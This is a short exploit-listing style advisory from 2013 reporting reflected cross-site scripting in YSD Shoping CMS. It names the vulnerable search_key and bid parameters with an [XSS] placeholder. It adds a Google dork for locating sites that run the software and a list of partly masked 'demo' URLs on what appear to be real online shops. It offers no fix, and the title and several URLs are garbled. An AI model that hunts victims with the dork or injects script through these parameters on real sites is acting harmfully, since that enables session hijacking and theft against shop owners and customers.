Exploit Title: YSD Shoping CMS XSS Vulnerability XSS Vulnerability In YSD Shoping CMS Date: 2013 13 September
Author: Hossein Hezami ( Dr.3v1l )
Author Email: [email protected]
Software Link: www.ysd.hk
Version: All Version
Category: webapps
Google dork : inurl:”/product_list.php?bid=” , intext:”Designed by YSD”
Tested on: Windows and Linux

Exploit :

http:///search_result.php?search_key=[XSS]
http:///product_list.php?bid=[XSS]

Demo :

www.dmXaudio.com/search_result.php?search_key=xss
www.Xom/search_result.php?search_key=xss
wwwXm/product_list.php?bid=xss
www.shoXbaby.com.hk/product_list.php?bid=xss